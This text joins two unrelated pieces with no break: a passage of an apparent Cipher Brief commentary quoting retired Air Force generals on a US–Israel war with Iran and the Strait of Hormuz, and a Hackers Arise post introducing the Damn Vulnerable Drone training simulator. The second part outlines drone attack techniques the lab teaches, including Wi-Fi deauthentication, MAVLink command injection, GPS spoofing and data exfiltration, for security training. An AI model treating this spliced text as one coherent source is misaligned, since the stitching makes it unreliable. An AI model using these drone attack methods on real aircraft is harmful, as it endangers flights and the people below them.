Slife continued, “I mean they [Iranians] have three sides of the Strait of Hormuz, right? It's a very narrow waterway. It's very shallow. The ability to maneuver inside the Strait is very limited. It's crowded. I mean there aren't a lot of great options.”

Then, as a former Air Force commander he offered the following views: “I mean, frankly, if there was a great option for how air power could unblock the Strait of Hormuz, it would probably be unblocked at this point. There are things that I think the air component is doing in conjunction with the naval component to target the means that Iran uses to exercise control over the Strait. But it is a very difficult problem. Geography just doesn't favor us in this regard.”

Ret.-Lt. Gen. Hinote added, “I think we're dealing with the problem of small numbers,” and then explained, “The [U.S.] joint force can be exceptionally good at preventing the majority of attacks on shipping [in the Strait]. That could even get into the 90% plus range. You could even call it 98%. But it's that last 2% that the joint force just has the most difficulty stopping [Iran from hitting a transiting ship] because you just can't stop everything when there are these mountainous rugged shores that Iran controls and they can use that as [protective] cover to attack shipping.”

Hinote went on, “So the problem is not necessarily that we're not militarily successful. I call 98% pretty militarily successful, but it's that last 2% that the [ship] insurance companies cannot accept. And so that's, I believe, the true dilemma that is facing the world economy today -- that as long as Iran has the will to try and negate shipping through the Strait, it's going to have some level of capability to do so. And that just creates a conundrum that we just haven't solved and [are] unlikely to solve.”

The two former Air Force generals also raised the issue of Israeli and U.S. forces having different missions for their military involved in attacking Iran.

Ret.-Gen. Slife put it this way: “I wonder to what extent the difference in [U.S. and Israeli] targeting reflects different national aims between Israel and the United States. I don't have any way of knowing that, but I do think it's noteworthy that we are actually, we have pursued very different target sets which may tell us something about what our respective national aims are.”

Ret.-Lt. Gen. Hinote picked up that idea saying, “To me, the Israeli theory of success is pretty straightforward. They [the Israelis] believe the Iranian regime will always be hostile to them and they believe that they have to go back and back and back to re-strike things and to re-strike the regime targets. And you might think of that as a strategy that we've heard called mowing the grass…meaning that the grass is going to grow back and we're going to go back and they are resigned to some way of mowing the grass again for years.”

That means, according to Hinote, “The more [Iranian] regime leaders we [meaning the Israelis] can kill, the better, because that means it takes more time for the new regime leaders to be dangerous to us.”

As for the U.S., according to Hinote, “We're at a stage now where we're fighting a coercion campaign…Hey, we want the Strait [of Hormuz] open. Hey, we want you to give up your nuclear aspirations.”

But now, as he adds, “There's nobody left in Iran who really can make that decision and enforce it up and down what is left of the government and military apparatus. So we're in a state now where what you might have thought of as the strategic aims and the military means, not only were they not necessarily totally aligned, they may have in certain circumstances worked against each other -- and that's a really difficult place to be.”

That is because, as Hinote points out, “We [the Israelis and U.S.] did one of the most successful, maybe the most successful decapitation operation [of Iranian leadership] in history. And so given that, I think you expect that there's going to be a high degree of paralysis and inaction at the

highest levels of the Iranian government. So you're almost thinking like, okay, well, what at that point, how do you take advantage of that strategic paralysis?”

However, there was no “strategic paralysis” in the Tehran regime, nor was there an internal uprising, as President Trump called for that night last February when he announced the first Iran attacks were underway. “When we are finished,” Trump said to the Iranian people, “take over your government. It will be yours to take. This will probably be your only chance for generations." Trump also called on the Islamic Revolutionary Guard Corps (IRGC), the armed forces and police to "lay down your weapons and have complete immunity" otherwise "face certain death."

As Hinote put it last week, “We're in a state now where what you might have thought of as the strategic aims and the military means not only were not necessarily totally aligned, they may

have in certain circumstances worked against each other -- and that's a really difficult place to be. And I think one of the reasons why it feels intractable right now is because you have that disparity.”

In fact, Hinote added, “The United States would like to be done with the Middle East, so that we could finally execute some sort of pivot to Asia. And we'd like to get out of all of these very expensive bases in the Middle East. And so we have a theory that is we want to put the [Iranian] regime into some sort of state where we don't have to go back anytime soon -- and we get to a steady state that is better than what was in existence on February 28th [when the U.S. and Israel first attacked Iran].”

Slife also mentioned an effect on U.S military readiness from the Iran War that need further attention when he said, “You know that all our readiness is built around how we generate and deploy forces, particularly for the Air Force and the Navy. We've seen heavy deployments beyond what the [military] services feel like they can routinely support from a readiness perspective and so those things always have a delayed effect.”

Slife added, “I think just the pace of operations over the last year has probably exceeded the Air Force and the Navy's ability to maintain levels of readiness going forward. So, I think we were going to have to pay close attention to that over the next three-to-five years, because there is always a delayed impact to these kinds of heavy operations.”

Hinote spoke about “the mission to rescue the [U.S.] back-seater of the F-15E [that was shot down over Iran]. We've only heard a little bit about that. My sense is that it was a huge operation that required tremendous integration across multiple types of forces in a very difficult time frame.”

He pointed out the difference from the troubled April 1980 Iran rescue attempt that was, he said, “so bad that it led to reforms for the next decade in the United States military. We may see that [the April 5, F-15E back-seater] rescue operation, in contrast, stands as being one of the best we've ever seen.”

Hinote then explained why saving the back-seater was so important.

“What if that weapon-system officer would have been captured and paraded in Iran on TV with the entire world seeing it real time,” Hinote said, “You could see that any political objectives that we were trying to achieve would be all the more difficult to achieve with one single pilot being paraded around in Iran…So, not only was the true political nature of the whole operation in jeopardy, but you [the U.S.] were willing to send what I think is going to end up being scores of airplanes into harm's way, multiple units, helicopters and such to go rescue this one pilot so that the political objectives could be preserved.”

While public concentration currently is on what’s not yet worked to end the Iran War, that rescue operation was one element that did succeed.

The Cipher Brief is committed to publishing a range of perspectives on national security issues submitted by deeply experienced national security professionals. Opinions expressed are those of the author and do not represent the views or opinions of The Cipher Brief.

Have a perspective to share based on your experience in the national security field? Send it to Editor@thecipherbrief.com for publication consideration.

Read more expert-driven national security insights, perspective and analysis in The Cipher Brief

Drone Hacking: Hacking UAVs with Damn Vulnerable Drone

Welcome back, cyberwarriors!

A while back, we walked you through building your own hacking drone. It was a drone loaded up with tools designed to help you out during an actual pentest. That was a hands-on project in every sense of the word. If you built one, you probably learned a ton just from putting the hardware together.

This time, we’re doing something different. No soldering iron. We’re staying entirely inside your laptop working with the Damn Vulnerable Drone, which is an open-source simulator built for teaching you exactly how drones get hacked, without you ever touching a real drone.

The Damn Vulnerable Drone

The Damn Vulnerable Drone, or DVD, is a training simulator that was made for people who want to learn drone hacking without buying a drone. It recreates an entire drone system in software, including a flight controller, an onboard companion computer, a ground control station and the wireless links connecting them all. Every piece is there, and every piece runs inside Docker containers on a single computer.

The project was built by Nicholas Aleks, a security researcher and co-founder of DEF CON Toronto, and it’s aimed squarely at intermediate-level red teamers and hacking enthusiasts who want to practice with actual drone protocols and architecture. Drone hardware and radios are genuinely expensive, and a mistake on a real flight controller can be costly. You get to make your mistakes safely, over and over, until you actually understand what you’re doing. DVD runs actual ArduPilot firmware as an ordinary program and pairs ArduPilot’s SITL with Gazebo, which is a 3D robotics simulator that supplies realistic physics. Motors spin up, GPS signals drift the way they really do, and the drone actually flies through a rendered 3D world.

Under the Hood

Every Docker container gets its own address on an internal network. That’s a design choice that mirrors how a real drone’s components actually work. The first piece is the Flight Controller, which runs the ArduPilot firmware itself and talks directly to the Gazebo simulator to process virtual sensor data. The second piece is the Companion Computer, which handles Wi-Fi, camera streaming, telemetry logging, and autonomous navigation, and which also exposes its own web interface for you to interact with. The third piece is the Ground Control Station, the pilot’s side of the operation, covering mission planning, mapping, video, and joystick control, all communicating over a simulated wireless MAVLink link. And the fourth piece is the Simulator itself, the Gazebo container that models flight physics behind the scenes. The documentation specifically tells you not to attack this fourth container directly, because doing so can crash the entire lab out from under you. Everything else is fair game. That one, leave alone.

Getting Started

To install it we need to pull down containers. The project offers two configurations based on whether you have a dedicated graphics card.

If the answer is no, you need Lite Mode. It uses a simplified 2D flight model, needs no GPU at all, and runs comfortably on 4 to 8 GB of RAM, 2 CPU cores, and about 100 GB of disk space. It works on Kali Linux or most other Linux distributions, and you can run it either on bare metal or inside a virtual machine. If the answer is yes, Full Mode gives you the complete Gazebo 3D environment, but it asks more of your machine in return. You need 8 to 16 GB of RAM, 2 to 4 CPU cores, 100 GB of disk space, and a GPU with at least 2 GB of VRAM supporting OpenGL 3.0 or newer. Full Mode is Kali Linux only, and it strongly prefers bare metal, though a virtual machine with GPU passthrough will also work.

Kali Linux is the officially supported operating system either way, and both modes need Docker and Docker Compose installed as the only real software dependency you have to worry about. Once Docker is installed, the whole lab comes up with a handful of commands. 

First, if Docker isn’t already on your system, you’ll want to install it:

kali > printf '%s\n' "deb https://download.docker.com/linux/debian bullseye stable" | sudo tee /etc/apt/sources.list.d/docker-ce.list

kali > curl -fsSL https://download.docker.com/linux/debian/gpg | sudo gpg --dearmor -o /etc/apt/trusted.gpg.d/docker-ce-archive-keyring.gpg

kali > sudo apt update -y
kali > sudo apt install docker-ce docker-ce-cli containerd.io -y
kali > sudo systemctl enable docker --now
kali > sudo usermod -aG docker $USER && newgrp docker

Then, clone the repository and pull down the containers. If you’re going with Lite Mode, do this:

kali > git clone https://github.com/nicholasaleks/Damn-Vulnerable-Drone.git && cd Damn-Vulnerable-Drone
kali > docker compose -f docker-compose-lite.yaml pull

From there, three small scripts manage the whole lab’s lifecycle for you:

kali > sudo ./start.sh --mode lite --Wi-Fi wpa2
kali > sudo ./status.sh
kali > sudo ./stop.sh

The start.sh script alone has quite a few options worth knowing about. The –mode full or –mode lite flag picks your simulation type, matching the two modes described above. And the –Wi-Fi wep or –Wi-Fi wpa2 flag is optional, but it’s worth turning on, because it spins up a virtual wireless network alongside everything else. That means your practice can actually include real Wi-Fi attacks as the very first step, instead of starting the exercise with network access already handed to you.

Interface and Feedback

Once everything is up and running, DVD is controlled through a browser-based management console sitting at localhost:8000

This console is really where the whole exercise plays out. A set of buttons trigger five distinct flight states: Initial Boot, Arm & Takeoff, Autopilot Flight, Emergency/Return-to-Land, and Post-Flight Data Processing. Each one simulates a different phase of a drone’s mission and opens up a different attack surface for you to explore. Triggering “Arm & Takeoff,” for instance, actually gets the simulated drone airborne, which gives GPS and navigation-based attacks something real to act on.

That mapping to real flight phases is there for a reason. A drone accepts different commands, and trusts different sources of data, depending on whether it’s sitting idle on the ground, climbing out after takeoff, cruising on autopilot, or executing an emergency fail-safe. That means exercises built around each individual state end up testing different parts of the system. 

The Attack Scenario Library

This is really the heart of the whole project. It has more than 40 named attack scenarios, organized into six categories, each one with its own documentation page and a spoiler-tagged walkthrough waiting behind it. It’s a deliberately broad menu, and it’s worth noticing that some scenarios are about gathering information without being noticed, while others are about actively manipulating or outright breaking the system in front of you.

Reconnaissance scenarios are about passively fingerprinting the drone, its companion computer, and its ground station by watching Wi-Fi and MAVLink traffic go by, without touching anything yet. Protocol Tampering scenarios involve spoofing telemetry values the drone reports, things like its GPS position, battery level, or system status, to see whether the system properly checks what it’s being told. Denial of Service scenarios focus on disrupting flight through methods like Wi-Fi deauthentication or flooding the communication link until it can’t keep up. Injection scenarios involve sending forged commands directly into the MAVLink stream, ranging all the way from a simple waypoint change to a full companion-computer takeover. Exfiltration scenarios are about pulling data off the drone entirely, whether that’s flight logs, mission plans, or content from the camera feed. And Firmware Attacks focus on modifying or reverse-engineering the ArduPilot firmware itself, right down at the code level.

Battery Spoofing

Because every scenario runs against fully simulated components, you actually get to see the complete effect of an attack play out. A spoofed GPS reading really does nudge the simulated flight path off course. A flooded communication link really does degrade control, right in front of you. And you get to watch all of it happen without any of the legal or physical risk that would come with testing the same techniques on live hardware.

Wi-Fi and Non-Wi-Fi Modes

DVD can be deployed in two different ways, and which one you pick depends on which part of the attack chain you actually want to practice. Wi-Fi Mode spins up a real, functioning virtual wireless network, broadcasting an SSID called Drone_Wi-Fi on the 192.168.13.0/24 range, with your choice of weak WEP encryption or the considerably stronger WPA2. This lets the whole exercise start from the very beginning, with you playing the role of an attacker who doesn’t have network access yet and has to earn it.

Non-Wi-Fi Mode skips that entire step and simply brings the containers up directly. This is useful if you just want to focus purely on protocol-level attacks, or if you’re not running inside a Kali VM with wireless card support to begin with. In this mode, the documentation asks you to treat the situation as though initial access to the drone’s data link has already been established, so you can jump straight to the MAVLink-level work.

Summary

The Damn Vulnerable Drone takes an idea that’s already well proven in web security and applies it to a domain where practicing on the real thing tends to be expensive. By simulating a full ArduPilot and MAVLink drone stack inside Docker, right down to Wi-Fi, camera streaming, and flight physics, it hands penetration testers, students, and researchers a realistic, disposable target, backed by more than 40 documented attack scenarios and built-in walkthroughs to guide the way. It won’t teach you to fly a real drone. But it will teach you exactly how one can be hacked, and for anyone working in drone security, that’s the more useful skill anyway.

If you’re interested in drone hacking, check out our Building Your Own Hacking Drone series, where we walk you through attack scenarios targeting Bluetooth and Wi-Fi across a wide range of devices.

We also offer a Drone Hacking training course, taking place November 10-12 at 4:00 PM UTC, available to Subscriber and Subscriber Pro students.

The post Drone Hacking: Hacking UAVs with Damn Vulnerable Drone first appeared on Hackers Arise.

❌